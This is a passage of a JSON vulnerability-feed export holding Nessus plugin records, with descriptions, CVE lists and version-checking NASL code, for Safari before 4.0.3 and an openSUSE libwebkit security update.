arbitrary code\n execution. (CVE-2009-2188)\n\n - A vulnerability in WebKit's parsing of floating point\n numbers may allow for remote code execution.\n (CVE-2009-2195)\n\n - A vulnerability in Safari may allow a malicious website\n to be promoted in Safari's Top Sites. (CVE-2009-2196)\n\n - A vulnerability in how WebKit renders an URL with look-\n alike characters could be used to masquerade a website.\n (CVE-2009-2199)\n\n - A vulnerability in WebKit may lead to the disclosure of\n sensitive information. (CVE-2009-2200)\n\n - A heap-based buffer overflow in CoreGraphics involving\n the drawing of long text strings could lead to a crash\n or arbitrary code execution. (CVE-2009-2468)", "edition": 25, "published": "2009-08-11T00:00:00", "title": "Safari < 4.0.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2199", "CVE-2009-2200", "CVE-2009-2196", "CVE-2009-2468", "CVE-2009-2195", "CVE-2009-2188"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "SAFARI_4_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/40554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(40554);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2009-2188\", \"CVE-2009-2195\", \"CVE-2009-2196\",\n \"CVE-2009-2199\", \"CVE-2009-2200\", \"CVE-2009-2468\");\n script_bugtraq_id(36022, 36023, 36024, 36025, 36026);\n\n script_name(english:\"Safari < 4.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Safari's version number\");\n\n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The version of Safari installed on the remote Windows host is earlier\nthan 4.0.3. Such versions are potentially affected by several\nissues :\n\n - A buffer overflow exists in the handling of EXIF\n metadata that ccould lead to a crash or arbitrary code\n execution. (CVE-2009-2188)\n\n - A vulnerability in WebKit's parsing of floating point\n numbers may allow for remote code execution.\n (CVE-2009-2195)\n\n - A vulnerability in Safari may allow a malicious website\n to be promoted in Safari's Top Sites. (CVE-2009-2196)\n\n - A vulnerability in how WebKit renders an URL with look-\n alike characters could be used to masquerade a website.\n (CVE-2009-2199)\n\n - A vulnerability in WebKit may lead to the disclosure of\n sensitive information. (CVE-2009-2200)\n\n - A heap-based buffer overflow in CoreGraphics involving\n the drawing of long text strings could lead to a crash\n or arbitrary code execution. (CVE-2009-2468)\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.apple.com/kb/HT3733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.securityfocus.com/advisories/17616\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Safari 4.0.3 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 200);\n script_set_attribute(\n attribute:\"patch_publication_date\",\n value:\"2009/08/11\"\n );\n script_set_attribute(\n attribute:\"plugin_publication_date\",\n value:\"2009/08/11\"\n );\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"safari_installed.nasl\");\n script_require_keys(\"SMB/Safari/FileVersion\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\npath = get_kb_item(\"SMB/Safari/Path\");\nversion = get_kb_item(\"SMB/Safari/FileVersion\");\nif (isnull(version)) exit(0);\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 4 ||\n (\n ver[0] == 4 &&\n (\n ver[1] < 531 ||\n (\n ver[1] == 531 && \n (\n ver[2] < 9 ||\n (ver[2] == 9 && ver[3] < 1)\n )\n )\n )\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (isnull(path)) path = \"n/a\";\n\n prod_version = get_kb_item(\"SMB/Safari/ProductVersion\");\n if (!isnull(prod_version)) version = prod_version;\n\n report = string(\n \"\\n\",\n \"Nessus collected the following information about the current install\\n\",\n \"of Safari on the remote host :\\n\",\n \"\\n\",\n \" Version : \", version, \"\\n\",\n \" Path : \", path, \"\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:54:00", "description": "Various bugs in webkit have been fixed. The CVE id's are :\n\nCVE-2009-0945, CVE-2009-1681, CVE-2009-1684, CVE-2009-1685,\nCVE-2009-1686, CVE-2009-1687, CVE-2009-1688, CVE-2009-1689,\nCVE-2009-1691, CVE-2009-1690, CVE-2009-1692, CVE-2009-1693,\nCVE-2009-1694, CVE-2009-1695, CVE-2009-1696, CVE-2009-1697,\nCVE-2009-1698, CVE-2009-1699, CVE-2009-1700, CVE-2009-1701,\nCVE-2009-1702, CVE-2009-1703, CVE-2009-1709, CVE-2009-1710,\nCVE-2009-1711, CVE-2009-1712, CVE-2009-1713, CVE-2009-1714,\nCVE-2009-1715, CVE-2009-1718, CVE-2009-1724, CVE-2009-1725,\nCVE-2009-2195, CVE-2009-2199, CVE-2009-2200, CVE-2009-2419,\nCVE-2009-2797, CVE-2009-2816, CVE-2009-2841, CVE-2009-3272,\nCVE-2009-3384, CVE-2009-3933, CVE-2009-3934, CVE-2010-0046,\nCVE-2010-0047, CVE-2010-0048, CVE-2010-0049, CVE-2010-0050,\nCVE-2010-0052, CVE-2010-0053, CVE-2010-0054, CVE-2010-0315,\nCVE-2010-0647, CVE-2010-0051, CVE-2010-0650, CVE-2010-0651,\nCVE-2010-0656, CVE-2010-0659, CVE-2010-0661, CVE-2010-1029,\nCVE-2010-1126, CVE-2010-1233, CVE-2010-1236, CVE-2010-1386,\nCVE-2010-1387, CVE-2010-1388, CVE-2010-1389, CVE-2010-1390,\nCVE-2010-1391, CVE-2010-1392, CVE-2010-1393, CVE-2010-1394,\nCVE-2010-1395, CVE-2010-1396, CVE-2010-1397, CVE-2010-1398,\nCVE-2010-1399, CVE-2010-1400, CVE-2010-1401, CVE-2010-1402,\nCVE-2010-1403, CVE-2010-1404, CVE-2010-1405, CVE-2010-1406,\nCVE-2010-1407, CVE-2010-1408, CVE-2010-1409, CVE-2010-1410,\nCVE-2010-1412, CVE-2010-1413, CVE-2010-1414, CVE-2010-1415,\nCVE-2010-1416, CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\nCVE-2010-1421, CVE-2010-1422, CVE-2010-1729, CVE-2010-1749,\nCVE-2010-1757, CVE-2010-1758, CVE-2010-1759, CVE-2010-1760,\nCVE-2010-1761, CVE-2010-1762, CVE-2010-1763, CVE-2010-1764,\nCVE-2010-1766, CVE-2010-1767, CVE-2010-1769, CVE-2010-1770,\nCVE-2010-1771, CVE-2010-1772, CVE-2010-1773, CVE-2010-1774,\nCVE-2010-1780, CVE-2010-1781, CVE-2010-1782, CVE-2010-1783,\nCVE-2010-1784, CVE-2010-1785, CVE-2010-1786, CVE-2010-1787,\nCVE-2010-1788, CVE-2010-1789, CVE-2010-1790, CVE-2010-1791,\nCVE-2010-1792, CVE-2010-1793, CVE-2010-1807, CVE-2010-1812,\nCVE-2010-1813, CVE-2010-1814, CVE-2010-1815, CVE-2010-1822,\nCVE-2010-1823, CVE-2010-1824, CVE-2010-1825, CVE-2010-2264,\nCVE-2010-2295, CVE-2010-2297, CVE-2010-2300, CVE-2010-2301,\nCVE-2010-2302, CVE-2010-2441, CVE-2010-3116, CVE-2010-3257,\nCVE-2010-3259, CVE-2010-3312, CVE-2010-3803, CVE-2010-3804,\nCVE-2010-3805, CVE-2010-3808, CVE-2010-3809, CVE-2010-3810,\nCVE-2010-3811, CVE-2010-3812, CVE-2010-3813, CVE-2010-3816,\nCVE-2010-3817, CVE-2010-3818, CVE-2010-3819, CVE-2010-3820,\nCVE-2010-3821, CVE-2010-3822, CVE-2010-3823, CVE-2010-3824,\nCVE-2010-3826, CVE-2010-3829, CVE-2010-3900, CVE-2010-4040", "edition": 25, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : libwebkit (openSUSE-SU-2011:0024-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-1813", "CVE-2009-1698", "CVE-2010-0052", "CVE-2010-0315", "CVE-2010-1412", "CVE-2010-3808", "CVE-2009-1691", "CVE-2010-3810", "CVE-2010-1397", "CVE-2009-2419", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1823", "CVE-2010-1789", "CVE-2009-2199", "CVE-2010-1757", "CVE-2010-1409", "CVE-2009-1712", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-3809", "CVE-2010-1783", "CVE-2010-3900", "CVE-2009-2200", "CVE-2009-2841", "CVE-2010-3812", "CVE-2009-1695", "CVE-2010-2301", "CVE-2010-3816", "CVE-2009-1718", "CVE-2010-2300", "CVE-2009-1685", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-1415", "CVE-2010-1769", "CVE-2010-3312", "CVE-2010-3818", "CVE-2009-1709", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-2297", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-3817", "CVE-2010-1389", "CVE-2010-1391", "CVE-2009-1700", "CVE-2009-1684", "CVE-2010-3803", "CVE-2010-1763", "CVE-2009-1725", "CVE-2010-1387", "CVE-2010-3829", "CVE-2010-3824", "CVE-2010-1126", "CVE-2010-1759", "CVE-2010-3811", "CVE-2009-1696", "CVE-2010-0650", "CVE-2009-1703", "CVE-2010-1388", "CVE-2010-0659", "CVE-2010-1786", "CVE-2010-1773", "CVE-2009-3934", "CVE-2010-1729", "CVE-2010-1785", "CVE-2010-1029", "CVE-2009-1689", "CVE-2010-3820", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2009-1688", "CVE-2009-0945", "CVE-2010-2264", "CVE-2009-1713", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-3826", "CVE-2010-2302", "CVE-2010-1398", "CVE-2010-1790", "CVE-2009-1711", "CVE-2009-1692", "CVE-2009-1681", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-3822", "CVE-2010-1413", "CVE-2010-1781", "CVE-2009-1690", "CVE-2010-3805", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1792", "CVE-2009-1724", "CVE-2010-1422", "CVE-2010-3819", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-1236", "CVE-2010-2441", "CVE-2009-2816", "CVE-2010-0656", "CVE-2009-2195", "CVE-2010-1812", "CVE-2009-3384", "CVE-2009-1687", "CVE-2010-1393", "CVE-2010-1791", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1825", "CVE-2010-0647", "CVE-2009-3933", "CVE-2010-1822", "CVE-2009-1699", "CVE-2010-1784", "CVE-2010-1824", "CVE-2010-1233", "CVE-2009-1701", "CVE-2010-0053", "CVE-2009-1715", "CVE-2010-3804", "CVE-2010-0047", "CVE-2009-1714", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-4040", "CVE-2010-1762", "CVE-2009-1694", "CVE-2010-0050", "CVE-2009-1702", "CVE-2010-1386", "CVE-2010-3821", "CVE-2009-1710", "CVE-2009-3272", "CVE-2010-3813", "CVE-2009-1686", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-3823", "CVE-2009-1693", "CVE-2010-1421", "CVE-2010-2295", "CVE-2010-1394", "CVE-2010-1399", "CVE-2010-0661", "CVE-2010-1793", "CVE-2009-1697"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:libwebkit-lang", "p-cpe:/a:novell:opensuse:libwebkit-devel", "p-cpe:/a:novell:opensuse:libwebkit-1_0-2", "p-cpe:/a:novell:opensuse:webkit-jsc"], "id": "SUSE_11_2_LIBWEBKIT-110111.NASL", "href": "https://www.tenable.com/plugins/nessus/53764", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libwebkit-3787.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53764);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:41\");\n\n script_cve_id(\"CVE-2009-0945\", \"CVE-2009-1681\", \"CVE-2009-1684\", \"CVE-2009-1685\", \"CVE-2009-1686\", \"CVE-2009-1687\", \"CVE-2009-1688\", \"CVE-2009-1689\", \"CVE-2009-1690\", \"CVE-2009-1691\", \"CVE-2009-1692\", \"CVE-2009-1693\", \"CVE-2009-1694\", \"CVE-2009-1695\", \"CVE-2009-1696\", \"CVE-2009-1697\", \"CVE-2009-1698\", \"CVE-2009-1699\", \"CVE-2009-1700\", \"CVE-2009-1701\", \"CVE-2009-1702\", \"CVE-2009-1703\", \"CVE-2009-1709\", \"CVE-2009-1710\", \"CVE-2009-1711\", \"CVE-2009-1712\", \"CVE-2009-1713\", \"CVE-2009-1714\", \"CVE-2009-1715\", \"CVE-2009-1718\", \"CVE-2009-1724\", \"CVE-2009-1725\", \"CVE-2009-2195\", \"CVE-2009-2199\", \"CVE-2009-2200\", \"CVE-2009-2419\", \"CVE-2009-2797\", \"CVE-2009-2816\", \"CVE-2009-2841\", \"CVE-2009-3272\", \"CVE-2009-3384\", \"CVE-2009-3933\", \"CVE-2009-3934\", \"CVE-2010-0046\", \"CVE-2010-0047\", \"CVE-2010-0048\", \"CVE-2010-0049\", \"CVE-2010-0050\", \"CVE-2010-0051\", \"CVE-2010-0052\", \"CVE-2010-0053\", \"CVE-2010-0054\", \"CVE-2010-0315\", \"CVE-2010-0647\", \"CVE-2010-0650\", \"CVE-2010-0651\", \"CVE-2010-0656\", \"CVE-2010-0659\", \"CVE-2010-0661\", \"CVE-2010-1029\", \"CVE-2010-1126\", \"CVE-2010-1233\", \"CVE-2010-1236\", \"CVE-2010-1386\", \"CVE-2010-1387\", \"CVE-2010-1388\", \"CVE-2010-1389\", \"CVE-2010-1390\", \"CVE-2010-1391\", \"CVE-2010-1392\", \"CVE-2010-1393\", \"CVE-2010-1394\", \"CVE-2010-1395\", \"CVE-2010-1396\", \"CVE-2010-1397\", \"CVE-2010-1398\", \"CVE-2010-1399\", \"CVE-2010-1400\", \"CVE-2010-1401\", \"CVE-2010-1402\", \"CVE-2010-1403\", \"CVE-2010-1404\", \"CVE-2010-1405\", \"CVE-2010-1406\", \"CVE-2010-1407\", \"CVE-2010-1408\", \"CVE-2010-1409\", \"CVE-2010-1410\", \"CVE-2010-1412\", \"CVE-2010-1413\", \"CVE-2010-1414\", \"CVE-2010-1415\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1419\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1729\", \"CVE-2010-1749\", \"CVE-2010-1757\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1763\", \"CVE-2010-1764\", \"CVE-2010-1766\", \"CVE-2010-1767\", \"CVE-2010-1769\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\", \"CVE-2010-1780\", \"CVE-2010-1781\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1788\", \"CVE-2010-1789\", \"CVE-2010-1790\", \"CVE-2010-1791\", \"CVE-2010-1792\", \"CVE-2010-1793\", \"CVE-2010-1807\", \"CVE-2010-1812\", \"CVE-2010-1813\", \"CVE-2010-1814\", \"CVE-2010-1815\", \"CVE-2010-1822\", \"CVE-2010-1823\", \"CVE-2010-1824\", \"CVE-2010-1825\", \"CVE-2010-2264\", \"CVE-2010-2295\", \"CVE-2010-2297\", \"CVE-2010-2300\", \"CVE-2010-2301\", \"CVE-2010-2302\", \"CVE-2010-2441\", \"CVE-2010-3116\", \"CVE-2010-3257\", \"CVE-2010-3259\", \"CVE-2010-3312\", \"CVE-2010-3803\", \"CVE-2010-3804\", \"CVE-2010-3805\", \"CVE-2010-3808\", \"CVE-2010-3809\", \"CVE-2010-3810\", \"CVE-2010-3811\", \"CVE-2010-3812\", \"CVE-2010-3813\", \"CVE-2010-3816\", \"CVE-2010-3817\", \"CVE-2010-3818\", \"CVE-2010-3819\", \"CVE-2010-3820\", \"CVE-2010-3821\", \"CVE-2010-3822\", \"CVE-2010-3823\", \"CVE-2010-3824\", \"CVE-2010-3826\", \"CVE-2010-3829\", \"CVE-2010-3900\");\n\n script_name(english:\"openSUSE Security Update : libwebkit (openSUSE-SU-2011:0024-1)\");\n script_summary(english:\"Check for the libwebkit-3787 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various bugs in webkit have been fixed. The CVE id's are :\n\nCVE-2009-0945, CVE-2009-1681, CVE-2009-1684, CVE-2009-1685,\nCVE-2009-1686, CVE-2009-1687, CVE-2009-1688, CVE-2009-1689,\nCVE-2009-1691, CVE-2009-1690, CVE-2009-1692, CVE-2009-1693,\nCVE-2009-1694, CVE-2009-1695, CVE-2009-1696, CVE-2009-1697,\nCVE-2009-1698, CVE-2009-1699, CVE-2009-1700, CVE-2009-1701,\nCVE-2009-1702, CVE-2009-1703, CVE-2009-1709, CVE-2009-1710,\nCVE-2009-1711, CVE-2009-1712, CVE-2009-1713, CVE-2009-1714,\nCVE-2009-1715, CVE-2009-1718, CVE-2009-1724, CVE-2009-1725,\nCVE-2009-2195, CVE-2009-2199, CVE-2009-2200, CVE-2009-2419,\nCVE-2009-2797, CVE-2009-2816, CVE-2009-2841, CVE-2009-3272,\nCVE-2009-3384, CVE-2009-3933, CVE-2009-3934, CVE-2010-0046,\nCVE-2010-0047, CVE-2010-0048, CVE-2010-0049, CVE-2010-0050,\nCVE-2010-0052, CVE-2010-0053, CVE-2010-0054, CVE-2010-0315,\nCVE-2010-0647, CVE-2010-0051, CVE-2010-0650, CVE-2010-0651,\nCVE-2010-0656, CVE-2010-0659, CVE-2010-0661, CVE-2010-1029,\nCVE-2010-1126, CVE-2010-1233, CVE-2010-1236, CVE-2010-1386,\nCVE-2010-1387, CVE-2010-1388, CVE-2010-1389, CVE-2010-1390,\nCVE-2010-1391, CVE-2010-1392, CVE-2010-1393, CVE-2010-1394,\nCVE-2010-1395, CVE-2010-1396, CVE-2010-1397, CVE-2010-1398,\nCVE-2010-1399, CVE-2010-1400, CVE-2010-1401, CVE-2010-1402,\nCVE-2010-1403, CVE-2010-1404, CVE-2010-1405, CVE-2010-1406,\nCVE-2010-1407, CVE-2010-1408, CVE-2010-1409, CVE-2010-1410,\nCVE-2010-1412, CVE-2010-1413, CVE-2010-1414, CVE-2010-1415,\nCVE-2010-1416, CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\nCVE-2010-1421, CVE-2010-1422, CVE-2010-1729, CVE-2010-1749,\nCVE-2010-1757, CVE-2010-1758, CVE-2010-1759, CVE-2010-1760,\nCVE-2010-1761, CVE-2010-1762, CVE-2010-1763, CVE-2010-1764,\nCVE-2010-1766, CVE-2010-1767, CVE-2010-1769, CVE-2010-1770,\nCVE-2010-1771, CVE-2010-1772, CVE-2010-1773, CVE-2010-1774,\nCVE-2010-1780, CVE-2010-1781, CVE-2010-1782, CVE-2010-1783,\nCVE-2010-1784, CVE-2010-1785, CVE-2010-1786, CVE-2010-1787,\nCVE-2010-1788, CVE-2010-1789, CVE-2010-1790, CVE-2010-1791,\nCVE-2010-1792, CVE-2010-1793, CVE-2010-1807, CVE-2010-1812,\nCVE-2010-1813, CVE-2010-1814, CVE-2010-1815, CVE-2010-1822,\nCVE-2010-1823, CVE-2010-1824, CVE-2010-1825, CVE-2010-2264,\nCVE-2010-2295, CVE-2010-2297, CVE-2010-2300, CVE-2010-2301,\nCVE-2010-2302, CVE-2010-2441, CVE-2010-3116, CVE-2010-3257,\nCVE-2010-3259, CVE-2010-3312, CVE-2010-3803, CVE-2010-3804,\nCVE-2010-3805, CVE-2010-3808, CVE-2010-3809, CVE-2010-3810,\nCVE-2010-3811, CVE-2010-3812, CVE-2010-3813, CVE-2010-3816,\nCVE-2010-3817, CVE-2010-3818, CVE-2010-3819, CVE-2010-3820,\nCVE-2010-3821, CVE-2010-3822, CVE-2010-3823, CVE-2010-3824,\nCVE-2010-3826, CVE-2010-3829, CVE-2010-3900, CVE-2010-4040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=601349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-01/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libwebkit packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 79, 94, 119, 189, 200, 264, 310, 352, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-1_0-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libwebkit-1_0-2-1.2.6-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libwebkit-devel-1.2.6-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libwebkit-lang-1.2.6-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"webkit-jsc-1.2.6-0.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libwebkit-1_0-2 / libwebkit-devel / libwebkit-lang / webkit-jsc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:55:28", "description": "Various bugs in webkit have been fixed. The CVE id's are :\n\nCVE-2009-0945, CVE-2009-1681, CVE-2009-1684, CVE-2009-1685,\nCVE-2009-1686, CVE-2009-1687, CVE-2009-1688, CVE-2009-1689,\nCVE-2009-1691, CVE-2009-1690, CVE-2009-1692, CVE-2009-1693,\nCVE-2009-1694, CVE-2009-1695, CVE-2009-1696, CVE-2009-1697,\nCVE-2009-1698, CVE-2009-1699, CVE-2009-1700, CVE-2009-1701,\nCVE-2009-1702, CVE-2009-1703, CVE-2009-1709, CVE-2009-1710,\nCVE-2009-1711, CVE-2009-1712, CVE-2009-1713, CVE-2009-1714,\nCVE-2009-1715, CVE-2009-1718, CVE-2009-1724, CVE-2009-1725,\nCVE-2009-2195, CVE-2009-2199, CVE-2009-2200, CVE-2009-2419,\nCVE-2009-2797, CVE-2009-2816, CVE-2009-2841, CVE-2009-3272,\nCVE-2009-3384, CVE-2009-3933, CVE-2009-3934, CVE-2010-0046,\nCVE-2010-0047, CVE-2010-0048, CVE-2010-0049, CVE-2010-0050,\nCVE-2010-0052, CVE-2010-0053, CVE-2010-0054, CVE-2010-0315,\nCVE-2010-0647, CVE-2010-0051, CVE-2010-0650, CVE-2010-0651,\nCVE-2010-0656, CVE-2010-0659, CVE-2010-0661, CVE-2010-1029,\nCVE-2010-1126, CVE-2010-1233, CVE-2010-1236, CVE-2010-1386,\nCVE-2010-1387, CVE-2010-1388, CVE-2010-1389, CVE-2010-1390,\nCVE-2010-1391, CVE-2010-1392, CVE-2010-1393, CVE-2010-1394,\nCVE-2010-1395, CVE-2010-1396, CVE-2010-1397, CVE-2010-1398,\nCVE-2010-1399, CVE-2010-1400, CVE-2010-1401, CVE-2010-1402,\nCVE-2010-1403, CVE-2010-1404, CVE-2010-1405, CVE-2010-1406,\nCVE-2010-1407, CVE-2010-1408, CVE-2010-1409, CVE-2010-1410,\nCVE-2010-1412, CVE-2010-1413, CVE-2010-1414, CVE-2010-1415,\nCVE-2010-1416, CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\nCVE-2010-1421, CVE-2010-1422, CVE-2010-1729, CVE-2010-1749,\nCVE-2010-1757, CVE-2010-1758, CVE-2010-1759, CVE-2010-1760,\nCVE-2010-1761, CVE-2010-1762, CVE-2010-1763, CVE-2010-1764,\nCVE-2010-1766, CVE-2010-1767, CVE-2010-1769, CVE-2010-1770,\nCVE-2010-1771, CVE-2010-1772, CVE-2010-1773, CVE-2010-1774,\nCVE-2010-1780, CVE-2010-1781, CVE-2010-1782, CVE-2010-1783,\nCVE-2010-1784, CVE-2010-1785, CVE-2010-1786, CVE-2010-1787,\nCVE-2010-1788, CVE-2010-1789, CVE-2010-1790, CVE-2010-1791,\nCVE-2010-1792, CVE-2010-1793, CVE-2010-1807, CVE-2010-1812,\nCVE-2010-1813, CVE-2010-1814, CVE-2010-1815, CVE-2010-1822,\nCVE-2010-1823, CVE-2010-1824, CVE-2010-1825, CVE-2010-2264,\nCVE-2010-2295, CVE-2010-2297, CVE-2010-2300, CVE-2010-2301,\nCVE-2010-2302, CVE-2010-2441, CVE-2010-3116, CVE-2010-3257,\nCVE-2010-3259, CVE-2010-3312, CVE-2010-3803, CVE-2010-3804,\nCVE-2010-3805, CVE-2010-3808, CVE-2010-3809, CVE-2010-3810,\nCVE-2010-3811, CVE-2010-3812, CVE-2010-3813, CVE-2010-3816,\nCVE-2010-3817, CVE-2010-3818, CVE-2010-3819, CVE-2010-3820,\nCVE-2010-3821, CVE-2010-3822, CVE-2010-3823, CVE-2010-3824,\nCVE-2010-3826, CVE-2010-3829, CVE-2010-3900, CVE-2010-4040", "edition": 25, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libwebkit (openSUSE-SU-2011:0024-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", 